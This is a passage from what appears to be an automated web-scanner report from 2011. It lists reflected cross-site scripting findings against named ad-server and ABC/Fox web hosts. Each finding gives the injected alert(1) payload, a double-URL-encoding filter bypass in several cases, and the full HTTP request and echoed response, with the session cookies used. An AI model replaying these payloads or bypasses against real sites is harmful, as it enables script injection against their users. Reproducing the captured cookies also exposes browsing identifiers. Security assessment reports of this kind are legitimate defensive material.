User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5858
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:00:14 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
csid=fox_home&sfid=&cdid=&pvrn=438724&vprn=&vip=50.23.123.106&vdur=&flag=;position=1&;ptgt=s&slid=172x235slot1e863b';alert(1)//2cbc42ff0ae&envp=g_js&w=172&h=235&lo=";
var v = ('ptgt=s&slid=172x235slot1e863b';alert(1)//2cbc42ff0ae&envp=g_js&w=172&h=235&lo=').replace(/envp=g_js/, '');
document.write(ct ? '<span id="172x235slot1e863b';alert(1)//2cbc42ff0ae" class="_fwph">
...[SNIP]...

2.7. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the ssid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86690"%3balert(1)//516bfa20066 was submitted in the ssid parameter. This input was echoed as 86690";alert(1)//516bfa20066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=7276686690"%3balert(1)//516bfa20066&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=187370371771976350&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b116_5659033498867353162";expires=Mon, 01 Oct 2012 23:01:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~1.1317596475.0,5.1317596463.0,20487.1317596463.0,20499.1317596475.0,^";expires=Tue, 01 Nov 2011 23:01:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596477.438724.273825~,1317596476.187370371771976350.654718~655005~,1317596387.43872487b53b22f1e05a28d243232b.273825~,1317596386.87b53b222920b5939f32a6e6.273825~,1317596384.18737037177197635087b53b22e29de1a420b69342.654718~,1317596383.87b53b229c5aed6da551a5cf.654718~,";expires=Tue, 01 Nov 2011 23:01:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1317596477.337.685841~690141~,1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,";expires=Tue, 01 Nov 2011 23:01:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596475.588.1.1,";expires=Tue, 01 Nov 2011 23:01:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317596477.1317596477.28800.0.0,sg143516.1317596127.1317596477.28800.0.174,";expires=Tue, 01 Nov 2011 23:01:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g127945";expires=Tue, 01 Nov 2011 23:01:17 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 4672
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:01:16 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
me:"INVALID_SITE_SECTION_CUSTOM_ID", severity:"WARN", _:{
"context":[
{_:"FOX_home"
}]}
}]}
}],
"visitor":[
{_:null
}],
"siteSection":[
{customId:"FOX_home", id:"7276686690";alert(1)//516bfa20066", pageViewRandom:"187370371771976350", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{
...[SNIP]...

2.8. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the vprn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed988"%3balert(1)//c4cc2308232 was submitted in the vprn parameter. This input was echoed as ed988";alert(1)//c4cc2308232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=187370371771976350&vprn=ed988"%3balert(1)//c4cc2308232&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="b035_5653126437071259818"; _auv="g193954~5.1316221071.0,21967.1316221071.0,^"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221071.28800.0.0,"; _wr="g193954"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5345525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _auv="87~5.1317596419.0,20487.1317596419.0,^g143516~1.1317596496.0,5.1317596494.0,20487.1317596494.0,20499.1317596496.0,^";expires=Tue, 01 Nov 2011 23:02:04 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317596524.187370371771976350.654718~,1317596523.438724d189a";alert(1)//1f9f374fad7.273825~,1317596522.438724ed645";c288ccd63bb.273825~,1317596521.187370371771976350".654718~,1317596518.187370371771976350'.655005~,";expires=Tue, 01 Nov 2011 23:02:04 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1317596524.337.685841~690141~,1317596449.33787b53b226a68f4f6b137aad7.685841~690141~,1317596447.87b53b22bcb46643d9adc951.690141~,";expires=Tue, 01 Nov 2011 23:02:04 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1317596514.588.1.1,";expires=Tue, 01 Nov 2011 23:02:04 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg143516.1317596127.1317596524.28800.0.174,";expires=Tue, 01 Nov 2011 23:02:04 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10747
Pragma: no-cache
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:02:03 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"187370371771976350", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", videoPlayRandom:"ed988";alert(1)//c4cc2308232", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

2.9. http://a.abc.com/service/gremlin/css/files/csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/css/files/csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 29e93%253cscript%253ealert%25281%2529%253c%252fscript%253ec860dc188c0 was submitted in the REST URL parameter 5. This input was echoed as 29e93<script>alert(1)</script>c860dc188c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/css/files/csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll.css29e93%253cscript%253ealert%25281%2529%253c%252fscript%253ec860dc188c0?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 24829
Content-Type: text/css
Last-Modified: Sun, 02 Oct 2011 22:58:23 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:22 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:23 GMT
Connection: close


/**
* @filepath: csar-ad,slideshow,carousellist,full-episode-carousel-list,video-clips-list,list,join,featured,poll29e93<script>alert(1)</script>c860dc188c0
* @created: Sun, 02 Oct 11 15:58:22 -0700
*/


/**
* @filepath: /csar-ad/csar-ad.css
* @created: Sun, 02 Oct 11 15:58:22 -0700
*/
/*    RECTANGLE FOOTER
------------------------------------------------
...[SNIP]...

2.10. http://a.abc.com/service/gremlin/css/files/home-page,generic,featured-start.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/css/files/home-page,generic,featured-start.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1f02d%253cscript%253ealert%25281%2529%253c%252fscript%253e528beb3d46c was submitted in the REST URL parameter 5. This input was echoed as 1f02d<script>alert(1)</script>528beb3d46c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/css/files/home-page,generic,featured-start.css1f02d%253cscript%253ealert%25281%2529%253c%252fscript%253e528beb3d46c?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 10892
Content-Type: text/css
Last-Modified: Sun, 02 Oct 2011 22:58:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed02
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:22 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:23 GMT
Connection: close


/**
* @filepath: home-page,generic,featured-start1f02d<script>alert(1)</script>528beb3d46c
* @created: Sun, 02 Oct 11 15:58:22 -0700
*/


/**
* @filepath: /pages/home-page.css
* @created: Sun, 02 Oct 11 15:58:22 -0700
*/
/* --------------------------------------------------
               General Se
...[SNIP]...

2.11. http://a.abc.com/service/gremlin/css/files/reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklike.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/css/files/reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklike.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bdd50%253cscript%253ealert%25281%2529%253c%252fscript%253e0db0440f260 was submitted in the REST URL parameter 5. This input was echoed as bdd50<script>alert(1)</script>0db0440f260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/css/files/reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklike.cssbdd50%253cscript%253ealert%25281%2529%253c%252fscript%253e0db0440f260?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 32879
Content-Type: text/css
Last-Modified: Sun, 02 Oct 2011 22:58:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed07
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:26 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:26 GMT
Connection: close


/**
* @filepath: reset,style,global,register-loader,social-link,textmessage,upgrade,abc-community,share-global,facebooklikebdd50<script>alert(1)</script>0db0440f260
* @created: Sun, 02 Oct 11 15:58:26 -0700
*/


/**
* @filepath: /shared/reset.css
* @created: Sun, 02 Oct 11 15:58:26 -0700
*/
/* --------------------------------------------------
               RESET CSS
---
...[SNIP]...

2.12. http://a.abc.com/service/gremlin/js/files/abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload 85104%252a%252falert%25281%2529%252f%252f1219963b799 was submitted in the REST URL parameter 5. This input was echoed as 85104*/alert(1)//1219963b799 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/js/files/abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start.js85104%252a%252falert%25281%2529%252f%252f1219963b799?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9679
Content-Type: text/javascript
Last-Modified: Sun, 02 Oct 2011 22:58:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed05
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:24 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=293
Date: Sun, 02 Oct 2011 22:58:24 GMT
Connection: close


/**
* @filepath: abchomepage,sfplayer,feplayer,breakingnews,browsercheck,featured-start85104*/alert(1)//1219963b799
* @created: Sun, 02 Oct 11 15:58:24 -0700
*/


/**
* @filepath: /pages/abchomepage/abchomepage.js
* @created: Sun, 02 Oct 11 15:58:24 -0700
*/

$(function(){$('h1.logo a, .airDate, span.playBtn, .car
...[SNIP]...

2.13. http://a.abc.com/service/gremlin/js/files/jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload 2e5e6%252a%252falert%25281%2529%252f%252f76f80514488 was submitted in the REST URL parameter 5. This input was echoed as 2e5e6*/alert(1)//76f80514488 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/js/files/jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js2e5e6%252a%252falert%25281%2529%252f%252f76f80514488?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 217378
Content-Type: text/javascript
Last-Modified: Sun, 02 Oct 2011 22:58:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed09
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:34 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=300
Date: Sun, 02 Oct 2011 22:58:35 GMT
Connection: close


/**
* @filepath: jquery,ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter2e5e6*/alert(1)//76f80514488
* @created: Sun, 02 Oct 11 15:58:35 -0700
*/


/**
* @filepath: /jquery-1.4.2.min.js
* @created: Sun, 02 Oct 11 15:58:33 -0700
*/
/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* C
...[SNIP]...

2.14. http://a.abc.com/service/gremlin/js/files/utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9fed7%253cscript%253ealert%25281%2529%253c%252fscript%253edf41d8fefd8 was submitted in the REST URL parameter 5. This input was echoed as 9fed7<script>alert(1)</script>df41d8fefd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /service/gremlin/js/files/utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll.js9fed7%253cscript%253ealert%25281%2529%253c%252fscript%253edf41d8fefd8?cb=v5.96 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://abc.go.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 88703
Content-Type: text/javascript
Last-Modified: Sun, 02 Oct 2011 22:58:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:58:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=284
Date: Sun, 02 Oct 2011 22:58:33 GMT
Connection: close


/**
* @filepath: utils-easing,itemSlider,slideshow,logger,carousellist,join,jquery-cycle-all,featured,form,validate,poll9fed7<script>alert(1)</script>df41d8fefd8
* @created: Sun, 02 Oct 11 15:58:33 -0700
*/


/**
* @filepath: /utils/jquery.easing.1.3.js
* @created: Sun, 02 Oct 11 15:58:32 -0700
*/

jQuery.easing['jswing']=jQuery.easing['swing'];jQuery.extend(
...[SNIP]...

2.15. http://abc.go.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7acb4"%3balert(1)//63f7b085878 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7acb4";alert(1)//63f7b085878 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?7acb4"%3balert(1)//63f7b085878=1 HTTP/1.1
Host: abc.go.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 87269
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 02 Oct 2011 22:58:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc01
X-Powered-By: ASP.NET
Cache-Expires: Sun, 02 Oct 2011 23:01:56 GMT
Date: Sun, 02 Oct 2011 22:58:56 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
bc.csar.go.com/DynamicCSAd?srvc=abc&itype=ThinBanner&itype=Rectangles&itype=Background&itype=LRGutters&itype=PopUnder&itype=Survey&itype=FPBranding&itype=Banner-Unicast&itype=RevenueScience&url=/index?7acb4";alert(1)//63f7b085878=1"; var paramD = "&"; var regexS = "[\?&]test=([^&#]*)"; var regex = new RegExp( regexS ); var resultsT = regex.exec( window.location.href ); if(resultsT != null) csarUrl += paramD + "test="+ resul
...[SNIP]...

2.16. http://ad.turn.com/server/bid/fan.bid [requestId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/bid/fan.bid

Issue detail

The value of the requestId request parameter is copied into the HTML document as plain text between tags. The payload 66ef5<script>alert(1)</script>d34c2adb418 was submitted in the requestId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/bid/fan.bid?pub=10063193&cch=10063206&l=300x250&requestId=C1Os7Gk0Jd6Y.b2Zy7Os0Gk6J66ef5<script>alert(1)</script>d34c2adb418&ref=http%3A%2F%2Fmyspace-nonugc-foxaudiencenetwork.com&rand=1317598679840 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://demr.opt.fimserve.com/adopt/?r=h&l=87200027&pos=mrec&rnd=596331511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
